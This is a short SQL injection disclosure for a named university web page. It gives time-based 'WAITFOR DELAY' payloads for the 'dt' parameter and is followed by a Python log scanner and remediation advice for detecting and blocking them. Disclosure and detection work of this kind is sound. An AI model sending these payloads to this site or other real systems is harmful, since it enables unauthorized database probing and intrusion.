http://www.aiou.edu.pk – SQL vulnerability

Allama Iqbal Open University

Website: http://www.aiou.edu.pk/All_Dept_List.asp?dt=1 (GET)

Vulnerability type: SQL injection

Submitted by: Waqas Haider

PoC:

Parameter: dt (GET)

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: dt=1;WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: dt=1 WAITFOR DELAY '0:0:5'

Notification: Vendor notified
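For defenders reviewing web server logs for this class of request, the following is an added example, not part of the original report: it flags requests whose dt value is not a plain integer, marks the WAITFOR DELAY pattern from the PoC, and notes when the response time suggests the delay ran. The log lines, their field order, the client addresses and the 4000 ms threshold are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (not real traffic). Assumed field order:
# date time method uri-stem uri-query client-ip status time-taken-ms
SAMPLE_LOG = """\
2016-07-26 10:00:01 GET /All_Dept_List.asp dt=1 203.0.113.10 200 120
2016-07-26 10:00:07 GET /All_Dept_List.asp dt=1;WAITFOR+DELAY+'0:0:5'-- 203.0.113.50 200 5130
2016-07-26 10:00:15 GET /All_Dept_List.asp dt=1+WAITFOR+DELAY+'0:0:5' 203.0.113.50 200 5098
2016-07-26 10:00:20 GET /All_Dept_List.asp dt=12 203.0.113.11 200 95
2016-07-26 10:00:25 GET /All_Dept_List.asp dt=abc 203.0.113.12 500 88
2016-07-26 10:00:31 GET /All_Dept_List.asp dt=1%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 203.0.113.50 200 5110
"""

WAITFOR = re.compile(r"waitfor\s+delay", re.IGNORECASE)

def param_value(query, name):
    """Return the raw value of `name`; split on '&' only so ';' stays in the value."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return None

def scan(log_text, page="/All_Dept_List.asp", param="dt", slow_ms=4000):
    """Return (time, client_ip, decoded_value, reasons) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 8 or fields[3].lower() != page.lower():
            continue
        raw = param_value(fields[4], param)
        if raw is None:
            continue
        value = unquote_plus(raw)      # decode %xx and '+' before matching
        reasons = []
        if not re.fullmatch(r"[0-9]+", value):
            reasons.append("non-integer value")
        if WAITFOR.search(value):
            reasons.append("WAITFOR DELAY")
        if reasons and int(fields[7]) >= slow_ms:
            reasons.append("slow response")   # the delay appears to have executed
        if reasons:
            findings.append((fields[1], fields[5], value, reasons))
    return findings

if __name__ == "__main__":
    for when, ip, value, reasons in scan(SAMPLE_LOG):
        print(when, ip, repr(value), ", ".join(reasons))
```

The same integer-only check, applied server-side before the value reaches the query and combined with a parameterized query, rejects both payloads listed in the PoC.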
